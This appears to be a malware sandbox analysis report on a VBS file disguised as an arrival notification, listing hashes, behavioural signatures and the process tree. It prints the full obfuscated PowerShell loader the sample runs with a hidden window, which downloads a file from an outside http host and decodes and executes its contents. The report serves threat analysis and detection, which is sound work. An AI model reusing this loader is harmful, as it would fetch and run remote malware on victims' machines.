Analysis
-
max time kernel
146s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11/06/2024, 14:53
Static task
static1
Behavioral task
behavioral1
Sample
Arrival_Notice_Notification_74494837484_783839374648_83837474678.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Arrival_Notice_Notification_74494837484_783839374648_83837474678.vbs
Resource
win10v2004-20240508-en
General
-
Target
Arrival_Notice_Notification_74494837484_783839374648_83837474678.vbs
-
Size
22KB
-
MD5
e1e74844d85bdd9c257262d781b6f1d8
-
SHA1
cbe9bdb7940eed3698e98a4512defe80e90ca5f9
-
SHA256
3eb2a07940092865f967fcf4ba55b61e07f50e014710ce11ceac4c736276fd72
-
SHA512
a5d6d9a24f58fab724d6b8db7040da4dc310d737e214c9f3415456804a00fc6c2e83f3a61c9339c8838080eb4d4c73cd410de66cdfd79ad533f6a0ae8ae932d2
-
SSDEEP
384:vlqi6VEygTmNnWHqBn7BsYYHct6wocwEOFrpqS4hQrm+EeXlAkGWhQT0vHP+VnEo:vcqnT5VwUEO1BIQi8fGTT0PP6EFrJA
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2164 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2164 powershell.exe 2164 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2164 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3244 wrote to memory of 2164 3244 WScript.exe 87 PID 3244 wrote to memory of 2164 3244 WScript.exe 87 PID 2164 wrote to memory of 1032 2164 powershell.exe 89 PID 2164 wrote to memory of 1032 2164 powershell.exe 89
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arrival_Notice_Notification_74494837484_783839374648_83837474678.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden "$Fremadskriden = 1;Function Sammenkoblendes($Afmystificerendes){$Fravalgsordnings=$Afmystificerendes.Length-$Fremadskriden;$Undereducation='Substring';For( $Pressuriser11=4;$Pressuriser11 -lt $Fravalgsordnings;$Pressuriser11+=5){$Srhed+=$Afmystificerendes.$Undereducation.Invoke( $Pressuriser11, $Fremadskriden);}$Srhed;}function marrow($Etageboligomraadet245){ . ($Svigerfdrene) ($Etageboligomraadet245);}$Cirsocele=Sammenkoblendes 'E.saM B go,aevz Oc.i alglTenulO,era dvi/Crab5Mega.Kubo0Lite Rann( SteWUnstiKns,nBarydKi.eoPic,w FrisEntr C,iN IsoTBind Mumm1Dipl0Nyct.Gran0Susa;C.el HkeWZapai,oblnin,e6Tolv4Fla.;boop San.xSejl6S,me4Svin;Mare WalerMillv ,or:Ove.1Fina2Fron1Carp.Natu0 uro)Encr BageGNrsyeInsoc uink ThooL.mi/S,pe2 Dec0Sknh1 s d0Holo0Regn1Bypo0Bada1Perv FastF MoliHie.rTa,le tanfHydroDerwx Swe/ Ent1 Eks2Sard1Caro. Str0 Amp ';$Dysmerogenetic=Sammenkoblendes 'Chu.UP.eus None M.nrPleu-ContA.remg SerefarvnMedbtF.rs ';$Spyttende124=Sammenkoblendes ' KorhA,sutDonntSvanp MixsBani:Hear/Mars/Priedma,faYapot BrueSubpa SypdSi.iv,adfitrane.porsKhas. komnSkrml Hod/RapecInspgKerciOply-G bob.roliAnsenU.fa/TilsVLitha ,ertIndpmSelvaSlgtnSurm.BlinpStilf nab T t ';$Outfeel=Sammenkoblendes ' ppr>Cel. ';$Svigerfdrene=Sammenkoblendes ' UnfiTri,eRem.xFa.r ';$Lkkedes='Klanneren';$Motionering = Sammenkoblendes ' F.eeHarvc.olyhOtoco Dem uspi% TakaBoarpH,lopt.redOntaaFir tappeaHemo%untr\ ,loNBenyi InttYarrrAf.ra Indt vedeKur,tK.lk.Ruf.B.kldrWis oRepl Skem&D ca& Leg Gea,e MilcF.rshfir,oSti. Opertatom ';marrow (Sammenkoblendes ' tre$Atr.gPengl.haro.xtrb.ooka elol Ric: resFUntru .urnT akg Se.i Ta,sBo.ht MaaaPrest Emu=Behj(sctdcPuppm.lyfdLgem micr/Ira.c Sco Sodi$TrypM BaroTitot No iSkydo,ounn SugeClocrBoxliLoggn ,ing Hjl)B.lb ');marrow (Sammenkoblendes 'over$SpligLehalH,stoweltbA.pha Undl .np: ejsS,olymArberC,rpfcartaAmbors,atvUdskeLaisn Di,sDest=Hodo$BunoS.uggpAftvySwadtTindtBegreUdbrnIn.adEle,e Dyr1B gr2Surn4 Ess.,rucsSycop ngulcoryiHandt Pre(Arge$N.rbOKommusi,vtBat fOvere AnkeBobllenla)Tris ');$Spyttende124=$Smrfarvens[0];$Teratoid= (Sammenkoblendes 'Keto$C,pigPenglCinno Strb ExaaTyfulnau,:BindPTrolr rouoS insOesttPladoOpdamEnq,i LeuaMaso=PrevNidete Sclw ,ud- B,nOKo,tb forj ReeeCheccEns tRebo Nat.SF,lnyForssStortO.ereTympm ez. GasN Ha eEva,tUdsy.AbsiWNoboe ilsb SepCCamel AfgicouneH,mmnOb it');$Teratoid+=$Fungistat[1];marrow ($Teratoid);marrow (Sammenkoblendes 'Selv$ TelPFordrBangoTamusArsetCurroUnremDelii,oejaMode.NotiHSpite PosaSkatdEkkoe Sk,r CoosIsom[Be e$ .liD.chiyDi.vsDehgmKrlfegeder Tr o D,tgHiereHeksnSkdeeDe,etTickisubecB.ll]Som,=Bu.a$S daCFleri der DrysGibbo PorcTin,eSyltlIsotePs.u ');$papegjes=Sammenkoblendes 'Bety$.nvaPD plrP,buoSaarsBrostCrino R,nmLikviSporaFidi.Spo,DP,ofoC.nsw CannFormlcouroInfea Po,dDyreFPlauiBarclBi leDa.a(D.sc$ R,lSSvirpK,asyko it Nictcra,eudsanOp,id Agee tri1Made2Scam4Klau,Ap,l$ O eNDikaoSubcd Hy,dIn.bl.oosi .ennPolygKrse)p il ';$Noddling=$Fungistat[0];marrow (Sammenkoblendes 'reti$overg omlZoo.oop.abBogha Kall Der:JomfH KnsoVr.ssOuthtmarkaChilg T leThradLi e= .te(StokTAkkoe LexsMysttuken-OrthP arta,umatOblih Out Dat$StopNAngloReetdRa,td KonlPar,iMa,mnVe,dg.oca)Whif ');while (!$Hostaged) {marrow (Sammenkoblendes 'U.an$ O.egAgurlSu,eoPaatbAccoa BarlEmal:AfklNSkyda KorrTi,tc .aroS jotLsrii topn B.n= P,l$ vet SelrPinnuQ,odeAfst ') ;marrow $papegjes;marrow (Sammenkoblendes 'P odSSl ttSjleaFeedrmilitHvle-FadeSGuazlSorteUtv.esidepUnar Up,e4Cauf ');marrow (Sammenkoblendes ',enn$EllegIn.ol,arwo Dilbp rta ovelAnti:OmstHProtoHekts atit hypaGuapgCoveeGarad .em=Slan(Myx TLoome .krsLabyt ,et-KleaPTritaBalatJoahh.olt Ban$S rcN indostr.dSo,hd SynlS.gti acknDatagRund)Ub.n ') ;marrow (Sammenkoblendes 'Br.d$U.deg msal UnmoTa pbkre aKonglCell: ,arMNonpi nds .bdaAdgadEnegvGlase K knPodgtSlatuunserBraseUraa=Un,r$AflygichtlT,ykop otbPseuaPe,glBoli: Mo fSulpyH elrStemtemphj Reme akt Si,sC,az+Buks+,nro%Ante$Sta SEs emCryprTal.f BusaLollr Secv iseB,iqnSpodsSaar.TowacFortoAffauBitmn Mytt Sip ') ;$Spyttende124=$Smrfarvens[$Misadventure];}$Windsorstolens=326452;$Maanedsskifte=27624;marrow (Sammenkoblendes 'T an$Skr,gBlepl,armoGestbFluxa Unil Kon:UnwiFElsdoFranrReoxbSt,moAffjg SemsIsmat Araa ConvTr,tsPleu Hypo=D.ba SimoG trie Co,tDell- TriCMuffoActinBioctLambeOsten Edit Str Ak $s.atN ,pooLin,d ProdLovllSalviAltanspelgGla, ');marrow (Sammenkoblendes 'S or$StorgVsenl Mino,menbKlitaSortlBasi:.anvPPseuhBepiyWhitcElekoF rlc Nono LitlLeddl Ec.oPiani,utydM cr Afbl=Inge Last[U,arSStrayStstsOp rtBu,feErotmGene.,tvlCenanoF rbnMyc,v ayseOl,rrNorstTu t]Act.:Ocea:.hamFJymorAflao OpfmKontBAfp.aHetzs .emeNona6 Tik4 ,hoSImpot.oumranfii M,tnAlidgSup (bytt$ ProFT.rboEcphrSk lbFagioko sgU,ras g rtDislaSup.v.abysNitr)Bell ');marrow (Sammenkoblendes 'Beri$ ,ndgOffilTrykoMethbInjuaInd,lSexo:AntiSSc,ae oln Semiv dbo BasrTrils MustBootiMuddpM.ndeKaranNe,rdIndiiCo ve Gu.rM ke Plac=Pati Spdb[SafeS RolyE prs SkotSexoeSvu.mAlbu.OpgaTE,ite Lukxani t Wea.EmaiEMa ln DolcPusloForvd BikiDiscnH rugNonp]Beta: Vi,:Re iAHa dSMarrCLeprICrosI P,e.EskaGKrn e ReftKearSLenst Ki,rDebaievann MidgAnk,(D ra$rstePS.ilhTygnyPr.tcAsseobabecLersoKn.kl N gl Unno T,mi M,rd Br.)Kl a ');marrow (Sammenkoblendes 'Ingr$ B mgJamblmanooS,arbTi.maContlTi,s:Fo bEHertlAdn sStemkGennoba.sv FresingmdKbsvi .orgAnmotMechs Tul=Hist$SkriSNo.dePartnFiffiQuonoAf vr CresIll t.veri MglpBet,eLibenTid,dProdiUpdie Le,r ags.Mades,rosuOprebG,orsdmpntunsarSo.eieje.n P.rgBes,(U,en$ NitWLkagiPe,in Co,dParasEvenoRe,br PlasTrictHn,koIntelTelee Dipn,icrs ra, Dat$ MetMWhisaTrava efinSkdeeGed.d Gr,sManns,ormk.ktoi DelfFredt MideN ma)F,in ');marrow $Elskovsdigts;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nitratet.Bro && echo t"3⤵PID:1032
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82